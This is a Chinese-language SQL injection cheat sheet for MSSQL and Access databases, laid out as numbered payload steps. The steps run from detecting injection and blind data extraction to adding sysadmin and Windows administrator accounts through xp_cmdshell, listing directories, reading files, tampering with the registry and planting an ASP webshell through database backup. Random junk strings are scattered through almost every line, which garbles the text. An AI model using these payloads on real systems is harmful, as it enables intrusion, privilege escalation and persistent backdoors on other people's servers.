1.判断是否有注入;and 1=1 ;and 1=2 _-v$fDrz
2.初步判断是否是mssql ;and user>0 H-m).^
3-0jxx(
3.注入参数是字符'and [查询条件] and ''=' b9b`%9/L
HyQ(9cn|
4.搜索时没过滤参数的'and [查询条件] and '%25'=' Mg^A,8lrm
YWANBM(v+
5.判断数据库系统 pNQ@aJ
&=Y%4vq
;and (select count(*) from sysobjects)>0 mssql 5Tidb$L;Du
fo9V&NE
;and (select count(*) from msysobjects)>0 access `J{{E,y
@
h,fahbH-
:Xx7':5
-=u9>S)!c
6.猜数据库 ;and (select Count(*) from [数据库名])>0 #H8QX5b)
YAi@EvzCVy
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 9(a*0H
Q"LlBp>t|#
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 MpJ3*$Dr
E%f!SD
9.(1)猜字段的ascii值(access) $S/WAw,/
!.q#X^@>L
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 wv%UsfD
ph~#{B(\
(2)猜字段的ascii值(mssql) d(Yuz#Qcrh
IMy!8$\u
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 PIsXX#`7;
Y\(?&7Aax
10.测试权限结构(mssql) `RqV\ 6G+
0V2~
p+2%LYR u
z`dnS]q9
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- r6:nYyF$)v
$z@nT.x5
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- V<n#%!M5gV
jlD3SF~2
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- r)G)i;;~*
m&_!*3BAG
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ]7|qhAh<L
X5Y. o&
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- *unJd"<*&@
uy=<n5`oNG
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- #D+.z)iZn
PB{5C*Y7^k
;and 1=(select IS_MEMBER('db_owner'));-- Dx P65wU
$*9:a3>zny
/hGu42YG
1Zp^X:(
11.添加mssql和系统的帐户 `|[UF^9
HN&]`cr;
;exec master.dbo.sp_addlogin username;-- o107. s
;exec master.dbo.sp_password null,username,password;-- $A: ?o?"7}
$fW8S8
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- g*%o%Lv
QP6a,^];
;exec master.dbo.xp_cmdshell 'net user username password #t">tL
)Z`OkkabnD
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Aacj?
lI[O!VuKc
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ,z$U=uo
z&|sks7
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- H)+wkR!~
[lj^lN8
lR]SGdY
7<F{a"5P
12.(1)遍历目录 f[$Z<:D-ve
W TC/mcS
;create table dirs(paths varchar(100), id int) *&F~<HC2+
w 1O)
;insert dirs exec master.dbo.xp_dirtree 'c:\' yjChnp
Cc
zhACNz4tJ
;and (select top 1 paths from dirs)>0 7(zY:9|(
:\#/T,K"
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ]=5D98B
~uO9>(?D
m\|ie8
RLF]Wa,
(2)遍历目录 YYd!/@|N5
Rd+`b
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- >!P !F(
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 "Ze<dB#,Y
7t/C:2^&
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 onUF@3V
ZOHGGO]1M
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 `S/;S<';
a#P{ [
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ey[+"6Awne
d?OsVT;U
{(`xA,El
'.tg\]|
13.mssql中的存储过程 H?'t>JX
U\tujK1
xp_regenumvalues 注册表根键, 子键 )u5+<OG}=
PPj0LFA
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 f.u+({"ql
^Hv4t
xp_regread 根键,子键,键值名 m[?gN&%nc
Vg?
1&8>
;exec xp_regread 8Jf4";
-$kAWP8P4
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 _WHGd&u
g h&,U`
xp_regwrite 根键,子键, 值名, 值类型, 值 :+}Eo9
Jg%jmI;Y
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 kT4Tb%7KM
;PX>] r5U0
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 lhx]r}@'MC
A{QA0X!p
xp_regdeletevalue 根键,子键,值名 Q|:qs\6q5
]kyGm2Ty9
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Fop'm))C8
dht*1i3v
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 g%f6D%d)A
ioS(;2F
RE75TqYW
[>U =P`
14.mssql的backup创建webshell NYp46;
3 n=ftkI
use model %u02KmV.
5Qgh\4
create table cmd(str image); =LMM]'no,
.Zv uhOn^
insert into cmd(str) values (''); Q96^rjY
iwT
PJGK|
backup database model to disk='c:\l.asp'; ;R{ffS6
"iTi+UZxe
jr=erVHK
f8836<c
15.mssql内置函数 @t?uhT*Z=
O0,=@nw8.
;and (select @@version)>0 获得Windows的版本号 |4|j5<5
`%S#XJU
;and user_name()='dbo' 判断当前系统的连接用户是不是sa %w3"B,k'9D
Omy<Y@$
;and (select user_name())>0 爆当前系统的连接用户 )wueR5P
E(G&mfhb
;and (select db_name())>0 得到当前连接的数据库 $fl+l5?9
a EmLf
,fW%Qv
C{8(ew
16.简洁的webshell z1 P=P%F
rRzc"W}K+
use model OtFGo8
&i?>mt
create table cmd(str image); zsuXN *
Ub-q0[6
insert into cmd(str) values (''); 'PVxc%[
eJwHeG
backup database model to disk='g:\wwwtest\l.asp';